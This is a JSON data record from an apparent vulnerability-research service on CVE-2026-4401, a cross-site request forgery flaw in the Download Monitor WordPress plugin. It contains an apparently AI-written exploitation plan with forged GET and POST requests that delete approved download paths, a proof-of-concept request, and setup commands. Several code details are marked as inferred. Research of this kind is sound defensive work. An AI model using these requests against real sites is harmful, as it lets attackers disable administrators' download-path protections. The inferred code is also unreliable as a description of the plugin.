[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fcNNsQCBt13vsJjzUlcKGgi4yyd_iRXC8N8v2PgeHzBs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-4401","download-monitor-cross-site-request-forgery-to-download-path-deletion-and-disabling","Download Monitor \u003C= 5.1.10 - Cross-Site Request Forgery to Download Path Deletion and Disabling","The Download Monitor plugin for WordPress is vulnerable to Cross-Site Request Forgery in the `actions_handler()` and `bulk_actions_handler()` methods in `class-dlm-downloads-path.php` in all versions up to, and including, 5.1.10. This is due to missing nonce verification on these functions. This makes it possible for unauthenticated attackers to delete, disable, or enable approved download paths via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","download-monitor",null,"\u003C=5.1.10","5.1.11","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:L","Cross-Site Request Forgery (CSRF)","2026-04-07 11:17:36","2026-04-07 23:25:27",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F33d70481-4652-44f4-99cf-67cc1ffab66a?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Ffrontend-tailwind.css","assets\u002Fcss\u002Ffrontend-tailwind.min.css","assets\u002Fcss\u002Ffrontend.css","assets\u002Fcss\u002Ffrontend.less","assets\u002Fcss\u002Ffrontend.min.css","changelog.txt","download-monitor.php","includes\u002Fadmin\u002Fclass-dlm-upsells.php","researched",false,3,"This exploitation research plan targets CVE-2026-4401 in the Download Monitor plugin. The vulnerability allows an unauthenticated attacker to delete or disable \"Approved Download Paths\" by tricking a site administrator into visiting a malicious link (CSRF), due to missing nonce verification in the administrative handlers.\n\n### 1. Vulnerability Summary\n*   **ID:** CVE-2026-4401\n*   **Vulnerability Type:** Cross-Site Request Forgery (CSRF)\n*   **Location:** `includes\u002Fadmin\u002Fclass-dlm-downloads-path.php` (inferred path based on class name)\n*   **Vulnerable Methods:** `actions_handler()` and `bulk_actions_handler()` in the `DLM_Downloads_Path` class.\n*   **Cause:** These methods process sensitive administrative actions (enabling, disabling, or deleting download paths) without calling `check_admin_referer()` or `wp_verify_nonce()`. Approved paths are a security feature in Download Monitor used to restrict file downloads to specific directories. Deleting or disabling them can disrupt the site's download functionality.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fedit.php?post_type=dlm_download&page=dlm_download_paths` (inferred based on plugin architecture for custom admin pages).\n*   **Vulnerable Parameters:**\n    *   `action`: The action to perform (e.g., `delete`, `disable`, `enable`).\n    *   `id`: The ID of the specific approved path to modify.\n*   **Authentication:** Requires a victim with `manage_options` or similar administrative capabilities for the plugin to be logged in.\n*   **Preconditions:** At least one \"Approved Download Path\" must exist.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The `DLM_Downloads_Path` class is instantiated during admin initialization.\n2.  **Hook Registration:** The `actions_handler()` method is likely hooked to `admin_init` or called within the `display()` logic of a `WP_List_Table` subclass.\n3.  **Missing Check:**\n    ```php\n    \u002F\u002F includes\u002Fadmin\u002Fclass-dlm-downloads-path.php (Conceptual\u002FInferred)\n    public function actions_handler() {\n        if ( ! isset( $_GET['action'] ) || ! isset( $_GET['id'] ) ) {\n            return;\n        }\n        \u002F\u002F VULNERABILITY: No check_admin_referer() call here.\n        $action = $_GET['action'];\n        $path_id = intval( $_GET['id'] );\n\n        if ( 'delete' === $action ) {\n            $this->delete_path( $path_id );\n        } elseif ( 'disable' === $action ) {\n            $this->disable_path( $path_id );\n        }\n    }\n    ```\n4.  **Sink:** The `delete_path` or `update` methods interact with the database (likely the `{$wpdb->prefix}dlm_download_paths` table) to remove or modify the record.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability is characterized by the **absence** of a nonce check. Therefore, no nonce is required to exploit the `actions_handler()` or `bulk_actions_handler()`. The attack succeeds as long as the request is made by a logged-in administrator.\n\n### 5. Exploitation Strategy\nThe goal is to demonstrate that an authenticated admin session can be leveraged to delete an approved path without a valid nonce.\n\n**Step 1: Identify\u002FCreate a Path**\nFirst, we must ensure an approved path exists to delete. We can create one via WP-CLI or by navigating the UI.\n\n**Step 2: Construct the CSRF Request**\nThe exploit will use a `GET` request, as administrative handlers in WP List Tables often process `$_GET` parameters for individual actions.\n\n*   **Action:** `delete`\n*   **URL:** `https:\u002F\u002FTARGET\u002Fwp-admin\u002Fedit.php?post_type=dlm_download&page=dlm_download_paths&action=delete&id=[PATH_ID]`\n\n**Step 3: Execute Exploit via Agent**\nThe agent will use `http_request` with the admin's cookies to simulate the CSRF.\n\n```javascript\n\u002F\u002F PoC Request Structure\nawait http_request({\n    method: \"GET\",\n    url: \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fedit.php?post_type=dlm_download&page=dlm_download_paths&action=delete&id=1\",\n    headers: {\n        \"Accept\": \"text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,*\u002F*;q=0.8\"\n    }\n});\n```\n\n### 6. Test Data Setup\n1.  **Plugin Installation:** Ensure Download Monitor \u003C= 5.1.10 is installed and active.\n2.  **Create Approved Path:** Use WP-CLI to insert a path into the database directly, as the UI might require nonces for the *creation* step (which is not part of this CVE).\n    ```bash\n    # Example SQL to create a path (adjust table prefix as needed)\n    wp db query \"INSERT INTO wp_dlm_download_paths (path, status) VALUES ('\u002Ftmp\u002F', 'enabled');\"\n    ```\n3.  **Identify ID:** Get the ID of the newly created path.\n    ```bash\n    wp db query \"SELECT id FROM wp_dlm_download_paths WHERE path='\u002Ftmp\u002F';\"\n    ```\n\n### 7. Expected Results\n*   The HTTP request should return a `302 Redirect` or a `200 OK` (if the page reloads).\n*   The response should **not** contain an \"Are you sure you want to do this?\" (WordPress's default \"fail2\" nonce error) or a \"Security check failed\" message.\n*   The targeted approved path should be removed from the database.\n\n### 8. Verification Steps\n1.  **Database Check:** Verify the record is gone.\n    ```bash\n    wp db query \"SELECT count(*) FROM wp_dlm_download_paths WHERE path='\u002Ftmp\u002F';\"\n    # Expected: 0\n    ```\n2.  **Admin UI Check:** Navigate to the Approved Paths page to see if the table is empty.\n    ```javascript\n    await browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fedit.php?post_type=dlm_download&page=dlm_download_paths\");\n    \u002F\u002F Verify path '\u002Ftmp\u002F' is not visible in the DOM.\n    ```\n\n### 9. Alternative Approaches\nIf `GET` is not processed by the handler, the `bulk_actions_handler()` might require a `POST` request.\n\n**Alternative POST Exploit:**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fedit.php?post_type=dlm_download&page=dlm_download_paths`\n*   **Body:** `action=bulk_delete&path_id[]=1&path_id[]=2`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n\nIf the page slug `dlm_download_paths` is incorrect, the agent should search the menu:\n`browser_eval(\"document.querySelector('a[href*=\\\"page=dlm\\\"]').href\")` to find the correct administrative page slug for download paths.","gemini-3-flash-preview","2026-04-17 20:54:24","2026-04-17 20:54:48",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","5.1.10","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags\u002F5.1.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-monitor.5.1.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags\u002F5.1.11","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-monitor.5.1.11.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-monitor\u002Ftags"]